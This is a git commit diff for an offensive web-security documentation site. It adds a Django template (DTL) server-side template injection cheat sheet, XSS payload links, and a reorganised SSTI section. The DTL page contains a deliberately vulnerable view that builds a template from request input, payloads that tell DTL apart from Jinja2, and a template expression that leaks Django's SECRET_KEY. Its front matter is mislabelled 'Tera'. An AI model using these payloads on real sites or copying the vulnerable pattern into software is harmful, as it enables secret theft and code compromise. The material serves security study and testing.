remplace _ with - and add DTL

content/docs/client-side/xss.md

@@ -20,6 +20,7 @@ toc: true
 ## Basic payloads
 
 - [Cross-site scripting (XSS) cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet): List of XSS payloads.
+- [Tiny XSS Payloads](https://tinyxss.terjanq.me/)
 
 ```html
 <script>alert()</script>

content/docs/framework/ssti/_index.md

@@ -0,0 +1,9 @@
+---
+title : "SSTI"
+description: "Offensive Web - SSTI"
+lead: "Offensive Web - SSTI"
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
+draft: false
+images: []
+---

content/docs/framework/ssti/django-template.md

@@ -0,0 +1,108 @@
+---
+title: "Tera"
+description: "Cheatsheet on Tera"
+lead: "Cheatsheet on Tera"
+date: 2023-01-01T00:00:00+00:00
+lastmod: 2023-01-01T00:00:00+00:00
+draft: false
+images: []
+menu:
+  docs:
+    parent: "ssti"
+weight: 620
+toc: true
+---
+
+## Django Template Engine (DTL)
+
+Django ships built-in backends for its own template system, creatively called the [Django template language (DTL)](https://docs.djangoproject.com/en/5.0/topics/templates/), and for the popular alternative `Jinja2`.
+
+## Usage
+
+Basic example of DTL:
+
+```html
+My first name is {{ first_name }}. My last name is {{ last_name }}.
+{{ my_dict.key }}
+{{ my_object.attribute }}
+{{ my_list.0 }}
+```
+
+Usage of DTL in a Django application:
+
+```python
+from django.template import engines
+
+django_engine = engines["django"]
+template = django_engine.from_string("Hello {{ name }}!")
+```
+
+Example of vulnerable code:
+
+```python
+from django.http import HttpResponse
+from django.template import engines
+
+def index(request):
+  message = request.GET.get("message")
+
+  engine = engines["django"]
+  template = engine.from_string("<html><body>" + message + "</body></html>")
+  return HttpResponse(template.render({}, request))
+```
+
+## Detection
+
+DTL vs Jinja2:
+
+| Payload            | Jinja2       | Django Templates         |
+| ------------------ | ------------ | ------------------------ |
+| `{% csrf_token %}` | Causes error | Anti-CSRF token HTML tag |
+| `{{ 7*7 }}`        | 49           | Causes error             |
+
+## Built-in
+
+### Debug
+
+```js
+{% debug %}
+```
+
+### CSRF
+
+```js
+{% csrf_token %}
+```
+
+### Secret Key Leak
+
+When `messages` is present in the template context and `CookieStorage` is being used we can walk through attributes of `messages` to access app's `SECRET_KEY`:
+
+```js
+{{ messages.storages.0.signer.key }}
+```
+
+### Filters
+
+List of all filters: [Built-in filter reference](https://docs.djangoproject.com/en/5.0/ref/templates/builtins/#built-in-filter-reference)
+
+### XSS
+
+- `safe`: Marks a string as not requiring further HTML escaping prior to output. When autoescaping is off, this filter has no effect.
+- `escape`: Escapes a string's HTML (HTML entity).
+- `force_escape`: Applies HTML escaping to a string.
+
+```html
+{% autoescape off %}
+    {{ message }}
+{% endautoescape %}
+
+{{ message|safe }}
+
+{{ some_list|safeseq|join:", " }}
+```
+
+## References
+
+- [Django template language (DTL)](https://docs.djangoproject.com/en/5.0/topics/templates/)
+- [[PDF] Django templates - Server-Side Template Injection](https://www.lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)

content/docs/framework/tera.md → content/docs/framework/ssti/tera.md

@@ -8,7 +8,7 @@ draft: false
 images: []
 menu:
   docs:
-    parent: "framework"
+    parent: "ssti"
 weight: 620
 toc: true
 ---

content/docs/getting-started/cheatsheets.md

@@ -17,6 +17,7 @@ toc: true
 
 - [mXSS cheatsheet](https://sonarsource.github.io/mxss-cheatsheet/)
 - [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
+- [Tiny XSS Payloads](https://tinyxss.terjanq.me/)
 
 ## SQL Injection